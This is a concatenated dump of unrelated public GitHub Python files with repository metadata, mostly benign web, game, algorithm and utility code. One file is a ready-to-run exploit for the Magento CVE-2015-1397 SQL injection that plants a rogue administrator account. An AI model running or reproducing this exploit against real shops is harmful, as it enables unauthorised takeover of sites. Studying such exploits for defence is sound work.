@app.errorhandler(401)
def page_not_found(e):
return Response('<p>Login failed</p>')
""" | UTF-8 | Python | false | false | 3,763 | py | 23 | main.py | 12 | 0.623173 | 0.620516 | 0 | 125 | 29.112 | 97 |
zufishantaj/mycodebase | 2,259,152,830,516 | 43511dba102fa440f60d2ec79e4e14ae258f1db1 | 39fbaaa26779579ca1a6cfde95520425ae66ed89 | /Class2/second.py | ac26dd91d29f0fc2abf8f49822a93717278e1c8e | [] | no_license | https://github.com/zufishantaj/mycodebase | 02eb7d846a69bba2de1df27c068919a00c3f4d8c | 74cba0a315bd129eff86190fbf4421ba28ab9a92 | refs/heads/master | 2022-12-31T19:14:01.574948 | 2020-10-27T20:26:16 | 2020-10-27T20:26:16 | 268,316,063 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | print('Please enter your name')
x=input()
print("Hello, "+ x)
| UTF-8 | Python | false | false | 64 | py | 63 | second.py | 42 | 0.640625 | 0.640625 | 0 | 3 | 19.666667 | 31 |
tingleshao/leetcode | 704,374,681,878 | b6d9264107aaef6b00363629f1af6e7bda770158 | 02425f5fffe5f46961c3167c46302ef84c6e48a4 | /palindrome_partitioning/main.py | 0c58ebc78f553d215972a5b91fda0237e68af093 | [] | no_license | https://github.com/tingleshao/leetcode | 583718b5e58c3611f3db352d82017ba1d4482f18 | e2c589a1e81282e1c3deb6dfc5cace595acb841b | refs/heads/master | 2021-01-23T03:43:31.256959 | 2015-01-23T18:00:25 | 2015-01-23T18:00:25 | 29,308,438 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution:
# @param s, a string
# @return a list of lists of string
def partition(self, s):
result = []
output = []
self.DFS(s,0,output,result)
return result
def isPalindrome(self,s,start,end):
# print start
# print end
while start < end:
if s[start] != s[end]:
return False
start += 1
end -= 1
return True
def DFS(self, s, start, output, result):
if start == len(s):
result.append(output)
return
for i in xrange(start,len(s)):
if self.isPalindrome(s, start, i):
output.append(s[start:i+1])
# print output
self.DFS(s,i+1,list(output),result)
output.pop(-1)
def main():
    """Demo entry point: print all palindromic partitions of "aab"."""
    solver = Solution()
    # Parenthesized print works on both Python 2 and 3; the original bare
    # `print expr` statement is a SyntaxError under Python 3.
    print(solver.partition("aab"))
if __name__ == "__main__":
    main()
ShangSky/YangShop | 9,637,906,647,953 | ab56abe248bf279b90c3100a06cc82f5ad7a1d7f | 6a96f3ed9cdffd3548845b44931e99345d7ba231 | /FoodShop/apps/goods/admin.py | cb1b08c1a72d35974b57a5c688dda21aaabe7f41 | [] | no_license | https://github.com/ShangSky/YangShop | ffca8c4d6e8468288dd6ce3e45e740e9cdc600ef | d2a7d0c1155fd7627d8bf7427bc72e9f2ee15fe9 | refs/heads/master | 2020-06-22T12:45:11.749754 | 2020-06-06T03:17:04 | 2020-06-06T03:17:04 | 197,717,146 | 2 | 1 | null | false | 2021-04-08T19:34:38 | 2019-07-19T06:43:01 | 2020-06-06T03:17:31 | 2021-04-08T19:34:35 | 2,954 | 2 | 1 | 13 | Python | false | false | from django.contrib import admin
from .models import Goods, GoodsBanner, Category, IndexBanner
# Branding: set all three admin-site titles (header, page title, index
# title) to the shop's Chinese name.
admin.site.site_header = admin.site.site_title = admin.site.index_title = '阳哥商城后台管理'
@admin.register(Goods)
class GoodsAdmin(admin.ModelAdmin):
    """Default admin for Goods (no customisation yet)."""
    pass
@admin.register(GoodsBanner)
class GoodsBannerAdmin(admin.ModelAdmin):
    """Default admin for GoodsBanner (no customisation yet)."""
    pass
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
    """Default admin for Category (no customisation yet)."""
    pass
@admin.register(IndexBanner)
class IndexBannerAdmin(admin.ModelAdmin):
    """Default admin for IndexBanner (no customisation yet)."""
    pass
| UTF-8 | Python | false | false | 507 | py | 67 | admin.py | 43 | 0.775967 | 0.775967 | 0 | 23 | 20.304348 | 84 |
pmontu/indian_farming | 11,854,109,739,581 | 7d30e2a5dad381de4e7cf912d2ac11bad4e532b9 | c2a663f9892510c6069a23bc75710758476585b1 | /usermgmt/serializers.py | 787edacdbfc84ded032cfa0e75d014864579cd62 | [] | no_license | https://github.com/pmontu/indian_farming | 6e7f663520a8dcd162a7b654b61f86119c86da24 | bdf3270d70c9ca487d52fdba7a865830ecd31580 | refs/heads/master | 2021-01-21T05:23:04.678827 | 2017-02-27T05:44:34 | 2017-02-27T05:44:34 | 83,179,818 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib.auth.models import User
from rest_framework import serializers
from rest_framework.validators import UniqueValidator
from .models import CustomUser
class UserSerializer(serializers.Serializer):
    """Serialize Django auth Users together with their CustomUser.user_type."""
    id = serializers.IntegerField(read_only=True)
    username = serializers.CharField(validators=[UniqueValidator(queryset=User.objects.all())])
    # source="customuser.user_type" nests the validated value under the
    # "customuser" key of validated_data (popped in create() below).
    user_type = serializers.ChoiceField(
        CustomUser.SPECIAL_USER_CHOICES,
        source="customuser.user_type")
    password = serializers.CharField(
        max_length=128, write_only=True,
        style={'input_type': 'password'})
    is_superuser = serializers.BooleanField(read_only=True)
    def create(self, validated_data):
        """Create a User plus its linked CustomUser from validated input."""
        customuser = validated_data.pop("customuser")
        user = User.objects.create_user(**validated_data)
        user_type = customuser["user_type"]
        CustomUser.objects.create(user=user, user_type=user_type)
        return user
    # NOTE(review): Meta.model appears to have no effect on a plain
    # serializers.Serializer (only ModelSerializer reads it) - confirm
    # whether ModelSerializer was intended; update() is not implemented.
    class Meta:
        model = User
verma7/dcos-cassandra-service-new | 15,513,421,897,305 | 1370135a4616813c94d1bd380fe2ab22c84b2766 | 8a421507d3f46eee694f91813dd39a403de57dd5 | /cli/dcos_cassandra/cassandra_utils.py | 9cd9aa10b675bfbfca574cd954ed0caba2cea3cd | [
"Apache-2.0"
] | permissive | https://github.com/verma7/dcos-cassandra-service-new | c3e557df8cec2583f07e1457c6aff016461d1054 | 0e02914513e191b7b78d14f2b0b2525a092363ff | refs/heads/master | 2020-04-05T00:35:26.189989 | 2016-10-05T00:32:19 | 2016-10-05T00:48:59 | 67,839,518 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# Copyright (C) 2015 Mesosphere, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from dcos import util
# Module-level override for the framework name; set via set_fwk_name().
__fwk = None


def get_fwk_name():
    """Framework name: explicit override, then CLI config, then "cassandra"."""
    return __fwk or util.get_config().get('cassandra.service_name') or "cassandra"
def set_fwk_name(name):
    """Override the framework/service name returned by get_fwk_name()."""
    global __fwk
    __fwk = name
def base_url():
    """DC/OS cluster base URL from CLI config, without a trailing slash."""
    dcos_url = util.get_config().get('core.dcos_url')
    return dcos_url.rstrip("/")
def marathon_url(slash_command):
    """Build a Marathon v2 API URL; *slash_command* is appended verbatim."""
    return "{0}/marathon/v2{1}".format(base_url(), slash_command)
def api_url(slash_command):
    """Service v1 API URL, honouring an explicit 'cassandra.url' override."""
    override = util.get_config().get('cassandra.url')
    if override is None:
        root = "{0}/service/{1}".format(base_url(), get_fwk_name())
    else:
        root = override.rstrip("/")
    return "{0}/v1{1}".format(root, slash_command)
def to_json(responseObj):
    """Raise for HTTP errors, then return the response body parsed as JSON."""
    responseObj.raise_for_status()
    return responseObj.json()
def print_json(jsonObj):
    """Pretty-print *jsonObj* as sorted, 4-space-indented JSON."""
    formatted = json.dumps(jsonObj, sort_keys=True, indent=4,
                           separators=(',', ': '))
    print(formatted)
| UTF-8 | Python | false | false | 1,641 | py | 146 | cassandra_utils.py | 127 | 0.648995 | 0.642291 | 0 | 62 | 25.467742 | 74 |
vilmarferreira/recibo_1 | 2,113,123,918,256 | 135a106ccb8e97cdb998bcf048b863a09f52d856 | e5b8d3fd12423648c9f0675d3b89b75fcd5a560b | /core/form.py | 887f5137369e4a98f4e024537b351e1ca8d6918f | [] | no_license | https://github.com/vilmarferreira/recibo_1 | 834cca4e64121f87a05ef976920ce5ffe2a36890 | 1fab47df4408609063bd40f563f1e7bc1e32c589 | refs/heads/master | 2020-04-13T17:11:22.393386 | 2018-12-27T22:26:47 | 2018-12-27T22:26:47 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django import forms
from dal import autocomplete
from core.models import Receipt, Person
class ReceiptForm(forms.ModelForm):
person = forms.ModelChoiceField(queryset=Person.objects.all(),widget=autocomplete.ModelSelect2(url='person-autocomplete'))
class Meta:
model=Receipt
exclude= () | UTF-8 | Python | false | false | 317 | py | 9 | form.py | 4 | 0.753943 | 0.750789 | 0 | 11 | 27.909091 | 126 |
parmarjh/graph-analytics-course | 8,315,056,726,242 | 77f5b9fd6ef6bbc943dda37c5369a3f6182a39b7 | bfccc163836369bb5e4b8a180ae0bda14bbdf6c2 | /lecture-4/flows/flows.py | c086e520ad56c4a27c0f948b3c5b162c2b267407 | [] | no_license | https://github.com/parmarjh/graph-analytics-course | dcec11eeb1d197b65a22f4e5cbadf509682d3912 | 0f04b0b743817f2f465e861938d055e644eefaeb | refs/heads/master | 2023-08-15T15:59:49.099725 | 2021-09-28T03:54:52 | 2021-09-28T03:54:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import networkx as nx
import matplotlib.pyplot as plt
import pprint as pp
G = nx.read_edgelist('./graph-flow.txt', nodetype=str,
data=(('capacity', int),), create_using=nx.DiGraph())
pos = nx.spring_layout(G)
nx.draw(G, pos, with_labels=True, node_color="#f86e00")
flow = nx.maximum_flow(G, _s="s", _t="t")
flow_value = nx.maximum_flow_value(G, _s="s", _t="t")
pp.pprint(flow)
print("Maximum flow value is: " + str(flow_value))
plt.show()
| UTF-8 | Python | false | false | 467 | py | 87 | flows.py | 51 | 0.640257 | 0.631692 | 0 | 19 | 23.578947 | 74 |
Pycord-Development/pycord | 16,363,825,413,142 | 709a8ca05db1f5d451dc6888781042788a38536b | 681d42ab5a237b580436eab6271768aefee3048e | /discord/types/__init__.py | 79e1e68bb7fbb6d1e91c2b0a2303a2f13c701158 | [
"MIT"
] | permissive | https://github.com/Pycord-Development/pycord | d2555f7e08f0eea29653ee1e4f6fb7847a859500 | a3bd2a04fbd7ac0cec5a119cc9b360965aaaab8e | refs/heads/master | 2023-08-29T07:10:24.810548 | 2023-08-29T01:37:00 | 2023-08-29T01:37:00 | 400,837,389 | 2,960 | 941 | MIT | false | 2023-09-11T20:15:37 | 2021-08-28T16:18:37 | 2023-09-11T14:24:43 | 2023-09-11T20:15:36 | 15,833 | 2,540 | 433 | 93 | Python | false | false | """
discord.types
~~~~~~~~~~~~~~
Typings for the Discord API
:copyright: (c) 2015-2021 Rapptz & (c) 2021-present Pycord Development
:license: MIT, see LICENSE for more details.
"""
| UTF-8 | Python | false | false | 183 | py | 126 | __init__.py | 79 | 0.666667 | 0.601093 | 0 | 9 | 19.333333 | 70 |
mygit2014/vulnexipy | 1,889,785,645,290 | c3685fe893985e37b544d2340587e1a515291041 | 5508a6634049bc83627f65337c1070c8f4c6d2e0 | /cve_2015_1397.py | f7b9742bd9b0324875c13ebb2095dca1ab1425c1 | [] | no_license | https://github.com/mygit2014/vulnexipy | 6163e5e77724a4be5babf8afd76f4be5143c5845 | c7dc0d4dabf48893baf0dc5c7b614cc62b5016e8 | refs/heads/master | 2023-04-21T10:45:56.438431 | 2021-05-10T10:38:26 | 2021-05-10T10:38:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import requests
import sys
import base64
import argparse
from log_colors import *
# SQL injection vulnerability in the getCsvFile
# function in the Mage_Adminhtml_Block_Widget_Grid
# class in Magento Community Edition (CE) 1.9.1.0
# and Enterprise Edition (EE) 1.14.1.0
# allows remote administrators to execute arbitrary
# SQL commands via the popularity[field_expr]
# parameter when the popularity[from] or popularity[to] parameter is set.
class CVE2015_1397:
    """Proof of concept for CVE-2015-1397 (Magento admin-grid CSV export
    SQL injection, described in the header comments above)."""
    def __init__(self, url, user, pswd):
        """Remember the target base URL and the credentials to create."""
        print (LogColors.BLUE + "victim: " + url + "..." + LogColors.ENDC)
        self.url = url
        self.user, self.pswd = user, pswd
        self.session = requests.Session()
    def exploit(self):
        """POST the injected popularity filter to the vulnerable endpoint."""
        print (LogColors.BLUE + "exploitation..." + LogColors.ENDC)
        q = "SET @SALT = 'rp';"
        q += "SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{passwd}')".format(passwd = self.pswd)
        q += " ), CONCAT(':', @SALT ));"
        q += "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;"
        q += "INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,"
        q += "`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,"
        q += "`rp_token_created_at`) "
        q += "VALUES ('Firstname','Lastname','hacked@hack.com','{user}',".format(user = self.user)
        q += "@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());"
        q += "INSERT INTO `admin_role` (parent_id,tree_level,sort_order,"
        q += "role_type,user_id,role_name) "
        q += "VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username ="
        q = q.replace("\n", "")
        q += " '{user}'),'Firstname');".format(user = self.user)
        # The SQL is smuggled through the popularity[field_expr] filter.
        pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(q)
        print (LogColors.YELLOW + pfilter + "..." + LogColors.ENDC)
        data = {
            "___directive" : "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
            "filter" : base64.b64encode(pfilter.encode()).decode(),
            "forwarded" : 1
        }
        r = self.session.post(
            self.url.rstrip("/") + "/index.php/admin/Cms_Wysiwyg/directive/index/",
            data = data
        )
        if r.ok:
            print (LogColors.YELLOW + "auth: " + self.user + ":" + self.pswd + LogColors.ENDC)
            print (LogColors.GREEN + "successfully send payload. hacked :)" + LogColors.ENDC)
        else:
            print (LogColors.RED + "sending payload failed :(" + LogColors.ENDC)
if __name__ == '__main__':
    # Parse CLI options and run the proof of concept.
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, help="target url")
    parser.add_argument('-user', '--username', required=True, help="auth username")
    parser.add_argument('-pswd', '--password', required=True, help="auth password")
    args = parser.parse_args()
    cve = CVE2015_1397(args.url, args.username, args.password)
    cve.exploit()
| UTF-8 | Python | false | false | 3,042 | py | 87 | cve_2015_1397.py | 83 | 0.60092 | 0.583498 | 0 | 64 | 46.515625 | 114 |
georgecai904/directconnect | 2,173,253,453,747 | f4ab26c97aa5f8e894145f10f9bb97de079ffc3d | d7d8a8b8ba443538db5465f21e1f0771c5f77d2e | /core/tests/test_sign_up.py | 8e51b7f5f008ca331d55dd4df1b7e67bba7bffa1 | [] | no_license | https://github.com/georgecai904/directconnect | cbe8462c166394d47d830633b2f460c4ec1b552b | 30c59ea4beda330cca313e9274261cc2e8bc5cde | refs/heads/master | 2021-04-19T00:57:34.798017 | 2017-07-12T14:40:20 | 2017-07-12T14:40:20 | 94,593,817 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.test import TestCase
from core.forms import NewUserForm
from django.contrib.auth.models import User
class AuthTest(TestCase):
def test_sign_up(self):
data = {
"username": "georgecai904",
"password": "testpassword",
"email": "mail@georgecai.com"
}
NewUserForm(data).save()
self.assertEqual(User.objects.count(), 1)
| UTF-8 | Python | false | false | 400 | py | 55 | test_sign_up.py | 35 | 0.6225 | 0.6125 | 0 | 14 | 27.571429 | 49 |
AboveColin/Webtechnologie_Project | 2,130,303,791,987 | 79cbbdec93ca9c1682af74834effe370c4cd51ff | 27aeefb14007ba389d937dfbe79eae09226db056 | /stage/forms.py | e3e40f452d0084470868a0f50b1e75f2d0e4e3c6 | [] | no_license | https://github.com/AboveColin/Webtechnologie_Project | bf97041c6d397e9acd19d627c05c271cf3766e48 | ef1462c1243aa212438c77ad04b3479daa18b230 | refs/heads/main | 2023-07-18T23:11:49.809803 | 2021-09-20T09:02:16 | 2021-09-20T09:02:16 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, SelectField
from wtforms.validators import data_required, Email, EqualTo
from wtforms import ValidationError
from stage.models import User, Begeleider
# A form where a user can login using a submit button, his username and password.
class Loginform(FlaskForm):
username = StringField("Gebruikersnaam", validators=[data_required()])
password = PasswordField("Wachtwoord", validators=[data_required()])
submit = SubmitField("Inloggen")
# A form where you can register as a user
class Registratie(FlaskForm):
email = StringField("E-mailadres", validators=[data_required(), Email()])
voornaam = StringField("Voornaam", validators=[data_required()])
achternaam = StringField("Achternaam", validators=[data_required()])
username = StringField("Gebruikersnaam", validators=[data_required()])
password = PasswordField("Wachtwoord", validators=[data_required(), EqualTo("pass_confirm", message="Wachtwoorden komen niet overeen")])
pass_confirm = PasswordField("Bevestig wachtwoord", validators=[data_required()])
submit = SubmitField("Registreer")
| UTF-8 | Python | false | false | 1,201 | py | 19 | forms.py | 7 | 0.741049 | 0.741049 | 0 | 22 | 52.409091 | 140 |
decayboy/Lean.Algorithms | 11,106,785,430,372 | a1b646f2cd56db07f4df24173cdfed201097f7b6 | 3aa19b823a911968725605dd6d2019b92e96a477 | /Python/GoogleTrends.py | c3e376b65ae40d03381f8ee6168b701dfb4db63e | [
"Apache-2.0"
] | permissive | https://github.com/decayboy/Lean.Algorithms | 884c08dd1a23a4bebc75df1aa7bf298c85248126 | 0109addf768fea511ffb05ef164653797d097245 | refs/heads/master | 2020-04-15T02:54:34.925488 | 2019-01-20T06:25:29 | 2019-01-20T06:25:29 | 164,328,522 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pandas as pd
import numpy as np
from datetime import timedelta
### <summary>
### Utilizes the monthly Google trends search term "debt" to anticipate potential price movements.
### Contrast other search terms and assets to produce interesting results.
### </summary>
class BasicTemplateAlgorithm(QCAlgorithm):
'''Basic template algorithm simply initializes the date range and cash'''
def Initialize(self):
'''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''
self.SetBrokerageModel(BrokerageName.InteractiveBrokersBrokerage)
self.SetBenchmark("SPY")
self.SetStartDate(2009,12, 1) #Set Start Date
self.SetEndDate(2018,8,18) #Set End Date
self.SetCash(100000) #Set Strategy Cash
self.equity = ['SPY', 'IEF']
self.months = {}
# Find more symbols here: http://quantconnect.com/data
self.AddEquity(self.equity[0], Resolution.Hour)
self.AddEquity(self.equity[1], Resolution.Hour)
self.google_trends = pd.DataFrame(columns=['Week', 'interest'])
self.file = self.Download("https://www.dropbox.com/s/lzah401ulb8cdba/debtMonthly.csv?dl=1")
self.file = self.file.split("\n")
i = 0
for row in self.file[1:]:
one_row = row.split(",")
self.google_trends.loc[i] = one_row
i += 1
self.google_trends["MA3"] = self.google_trends.interest.rolling(3).mean()
self.google_trends["MA18"] = self.google_trends.interest.rolling(18).mean()
self.google_trends["Signal"] = self.google_trends["MA3"].astype('float') - self.google_trends["MA18"].astype('float')
self.google_trends["Signal"] = self.google_trends["Signal"].shift(1)
def OnData(self, data):
'''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.
Arguments:
data: Slice object keyed by symbol containing the stock data
'''
date_today = self.Time.date()
date_today = date_today.strftime(format='%Y-%m-%d')
date_today = date_today[0:7]
signal = self.google_trends.loc[self.google_trends.Week == date_today,"Signal"].iloc[0]
try:
invested = self.months[date_today]
except:
invested = "No"
if self.Time.hour == 15 and invested == "No":
if self.Portfolio[self.equity[0]].Quantity > 0 and signal > 0:
self.Liquidate(self.equity[0])
if self.Portfolio[self.equity[1]].Quantity > 0 and signal < 0:
self.Liquidate(self.equity[1])
if signal < 0 and self.Portfolio[self.equity[0]].Quantity == 0:
self.SetHoldings(self.equity[0], 1)
self.months[date_today] = "Yes"
return
if signal > 0 and self.Portfolio[self.equity[1]].Quantity == 0:
self.SetHoldings(self.equity[1], 1)
self.months[date_today] = "Yes"
return
| UTF-8 | Python | false | false | 3,141 | py | 2 | GoogleTrends.py | 1 | 0.610315 | 0.590258 | 0 | 68 | 45.191176 | 151 |
marcenavuc/battle_city | 13,700,945,710,554 | 9ef0f7027bed2c91dfbe9fe9bddfd8a3b6cc9c14 | 17dfa7fc4e5a37fb2ef8d67126c2a633a1210a9e | /battle_city/game_objects/tanks.py | f0f21e9c414cad894fc04b86397efefb5d8e3931 | [] | no_license | https://github.com/marcenavuc/battle_city | c404c528ebb3f273f1aa2d4ac91acf8891fb52da | 75c164d73b6d060fbb4a052fad41fcfafc5687f1 | refs/heads/main | 2023-02-10T00:31:57.629343 | 2020-12-30T15:38:18 | 2020-12-30T15:38:18 | 305,317,156 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import logging
import random
import time
import pygame
from battle_city.config import RESPAWN_TIME
from battle_city.game_objects import Missile
from battle_city.game_objects.game_object import Directions, Movable,\
GameObject
logger = logging.getLogger(__name__)
class Tank(Movable):
image = "media/images/tank.png"
def __init__(self, position, direction=Directions.UP, *args, **kwars):
super().__init__(position, *args, **kwars)
self.velocity = 5
self.health = 1
self.speed = 5
self.is_shot = False
self.period_duration = RESPAWN_TIME / 8
self.time_of_creation = time.time()
def set_position(self, position: pygame.rect.Rect, level) \
-> pygame.rect.Rect:
if self.is_collidelist(position, level.floor) >= 0:
self.speed = self.velocity / 2
else:
self.speed = self.velocity
if (
self.in_borders(position, level)
and self.is_collidelist(position, level.walls) < 0
and self.is_collidelist(position, level.blocks) < 0
):
return position
return self.rect
def shot(self, level):
missile_position = self.move(self.direction, speed=25)
if self.is_shot and missile_position.colliderect(missile_position):
missile = Missile(missile_position, self.direction)
level.missiles.append(missile)
class EnemyTank(Tank):
image = "media/images/tank.png"
def __init__(self, position, *args, **kwars):
super().__init__(position, *args, **kwars)
def update(self, event: pygame.event, level, *args):
if abs(self.time_of_creation - time.time()) < self.period_duration:
self.random_walk(level)
elif abs(self.time_of_creation - time.time()) < 2*self.period_duration:
self.move_to_obj(level.player, level)
else:
self.move_to_obj(level.command_center, level)
def random_walk(self, level):
rand_number = random.randint(1, 1000)
direction = self.direction
if rand_number < 100:
direction = Directions.random_direction()
if rand_number < 50:
self.shot(level)
new_position = self.move(direction)
self.rect = self.set_position(new_position, level)
def move_to_obj(self, obj: GameObject, level):
direction = self.direction
if self.rect.y + self.speed < obj.rect.y:
direction = Directions.DOWN
elif self.rect.y - self.speed > obj.rect.y:
direction = Directions.UP
elif self.rect.x - self.speed < obj.rect.x:
direction = Directions.RIGHT
elif self.rect.x + self.speed > obj.rect.x:
direction = Directions.LEFT
new_position = self.move(direction)
print(self.rect, new_position)
new_rect = self.set_position(new_position, level)
if self.rect == new_rect:
logger.debug("Didn't found the way")
self.period_duration *= 2
else:
self.rect = new_rect
class SpeedTank(EnemyTank):
image = "media/images/tank.png"
def __init__(self, position, *args, **kwars):
super().__init__(position, *args, **kwars)
self.speed = 10
class HeavyTank(EnemyTank):
image = "media/images/heavy_tank.png"
def __init__(self, position, *args, **kwars):
super().__init__(position, *args, **kwars)
self.speed = 2
self.health = 3
class RushTank(EnemyTank):
image = "media/images/rush_tank.png"
def __init__(self, position, *args, **kwars):
super().__init__(position, *args, **kwars)
self.speed = 5
def update(self, event: pygame.event, level, *args):
self.move_to_obj(level.command_center, level)
| UTF-8 | Python | false | false | 3,806 | py | 35 | tanks.py | 26 | 0.602995 | 0.595901 | 0 | 119 | 30.983193 | 79 |
JMHOO/planet-insight | 4,629,974,775,692 | 5e98067d0ebf3f4aa3ecd7ba12eb83f53db5a6a0 | 79659f16658fadd105295497c84193b8017eb68a | /package/insight/agent.py | 5042c0db4bd7853f0e484860558230ad6706fb34 | [] | no_license | https://github.com/JMHOO/planet-insight | 13a0652849f1c2b08d8a9b7968c24a4085b04ff8 | d2a40459b3d2bdd5bfedb8f3707e19bc5e2e7678 | refs/heads/master | 2021-09-11T00:54:29.128438 | 2018-04-05T05:09:32 | 2018-04-05T05:09:32 | 103,308,427 | 3 | 2 | null | false | 2018-04-05T05:09:33 | 2017-09-12T18:46:05 | 2018-01-12T01:43:54 | 2018-04-05T05:09:33 | 436 | 2 | 1 | 1 | JavaScript | false | null | from .storage import DBJobInstance, DBWorker
import docker
import platform
import threading
from random import randint
from time import sleep
from simple_settings import LazySettings
import os
settings = LazySettings('insight.applications.settings')
class LocalDockerRunner():
def __init__(self, cli, gpu_count, image_name, volumes, commands, environments=None):
self.docker = cli
self.gpu_count = gpu_count
self.image_name = image_name
self.volumes = volumes
self.commands = commands
self.environments = environments
self.containerId = ""
self._t = None
self.volumes = {"nvidia_driver_384.98": "/usr/local/nvidia"}
self._reportor = DBWorker()
def start(self):
self._t = threading.Thread(target=self.run_container)
self._t.start()
def is_container_running(self):
for container in self.docker.containers(all=False):
if container['Id'] == self.containerId:
return True
return False
def __del__(self):
if self._t:
self._t.join()
def run_container(self):
commands = ''
if self.commands:
commands = 'bash -c "' + self.commands + '"'
binds = []
for s, d in self.volumes.items():
binds.append(s + ":" + d)
volumes = list(self.volumes.values())
devices = ["/dev/nvidiactl:/dev/nvidiactl", "/dev/nvidia-uvm:/dev/nvidia-uvm"]
for i in range(self.gpu_count):
devices.append("/dev/nvidia{}:/dev/nvidia{}".format(i, i))
host_config = self.docker.create_host_config(devices=devices, binds=binds)
response = self.docker.create_container(
image=self.image_name,
volumes=volumes,
command=commands,
environment=self.environments,
host_config=host_config)
if response['Warnings'] is None:
self.containerId = response['Id']
else:
print(response['Warnings'])
return
self.docker.start(self.containerId)
print('Container {} started, waiting to finish...'.format(self.containerId))
# Keep running until container is exited
while self.is_container_running():
sleep(1)
self._reportor.report(platform.node(), system_info="{}", status='training')
# Remove the container when it is finished
self.docker.remove_container(self.containerId)
print('Container exited')
class AgentService(threading.Thread):
def __init__(self, gpu_count=1):
super().__init__()
self.stoprequest = threading.Event()
self.gpu_count = gpu_count
self.worker_name = platform.node()
def stop(self, timeout=None):
self.stoprequest.set()
super().join(timeout)
def run(self):
print('INFO::Agent service started.')
try:
aws_key = os.environ['AWS_ACCESS_KEY_ID']
aws_access = os.environ['AWS_SECRET_ACCESS_KEY']
aws_region = os.environ['AWS_DEFAULT_REGION']
except KeyError:
print('ERROR::AWS credential not configed, exit.')
return
# docker instance
self._docker = None
try:
if platform.system() is 'Windows':
self._docker = docker.APIClient(base_url='npipe:////./pipe/docker_engine')
else:
self._docker = docker.APIClient(base_url='unix:///var/run/docker.sock')
except:
self._docker = None
if self._docker is None:
print('ERROR::No docker engine installed, abort!')
return
print('INFO::Connected to docker engine.')
self._jobs = DBJobInstance()
self._reportor = DBWorker()
while not self.stoprequest.is_set():
random_sleep = randint(3, 10)
# do job checking
new_job = self._jobs.check_new_job()
if new_job is not None:
print('Got new jog: {}'.format(new_job))
pretrain_weights = '-w ' + new_job['pretrain']
#if pretrain_weights != 'NONE':
# pretrain_weights = '-w ' + pretrain_weights
#else:
# pretrain_weights = ''
monitor_service = settings.MONITOR['HOST'] + settings.MONITOR['PATH']
command = '/home/root/insight/run_worker.sh -i {} -m {} {} -d {} -s {}'.format(
new_job['instance_name'], new_job['model_name'], pretrain_weights, new_job['dataset_name'], monitor_service
)
print(command)
environment = {
'AWS_ACCESS_KEY_ID': aws_key,
'AWS_SECRET_ACCESS_KEY': aws_access,
'AWS_DEFAULT_REGION': aws_region
}
self._reportor.report(platform.node(), system_info="{}", status='preparing')
# do job and waiting
runner = LocalDockerRunner(
self._docker,
self.gpu_count,
settings.DOCKER['IMAGE'] + ':' + settings.DOCKER['VERSION'],
volumes=None,
commands=command,
environments=environment
)
# since we already in a thread, call block function instead of start another thread
runner.run_container()
# sleep random seconds between 3 ~ 10
print('INFO::No job, waiting {} seconds'.format(random_sleep))
self._reportor.report(platform.node(), system_info="{}", status='idle')
sleep(random_sleep)
| UTF-8 | Python | false | false | 5,755 | py | 61 | agent.py | 49 | 0.550304 | 0.548045 | 0 | 167 | 33.45509 | 127 |
Bibek-Bhandari/argument-mining-assignment | 19,430,432,073,296 | 536d6d45526ee94b3f6b9bb8a0c1a847b25af466 | 6329df89021c2adf5f12f44a503bb415db58f9b7 | /argument-mining-assignment/code/evaluation.py | 6a06b7c21569e9cc38f54c4d79aa44788c8d3e7e | [] | no_license | https://github.com/Bibek-Bhandari/argument-mining-assignment | dae14e26863f317f156157a332e9c81f69db727d | 13587b43cde29f3e5d0565b49b831a1fb8ace3c8 | refs/heads/master | 2022-10-17T10:54:56.720217 | 2020-05-29T17:16:11 | 2020-05-29T17:16:11 | 266,842,567 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import argparse
from sklearn.metrics import f1_score
def evaluation(path_to_ground_truth_bio, path_to_pred_bio):
'''
Computing F1-score for each of the major-claim, claim, premises, and non-argumentative classes
'''
gt_bio = [x.split('\t') for x in open(path_to_ground_truth_bio).readlines() if x !='\n']
pred_bio = [x.split('\t') for x in open(path_to_ground_truth_bio).readlines() if x !='\n']
assert len(gt_bio) == len(pred_bio), 'Number of tokens in the prediction file is different than the ground truth.'
#F1-score overall tokens..
_, gt_y = zip(*gt_bio)
_, pred_y = zip(*pred_bio)
overall_f1_score = f1_score(gt_y, pred_y, average='macro')
print('F1-SCORE: ', overall_f1_score )
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Evaluate your approach')
parser.add_argument('--gt_bio_path')
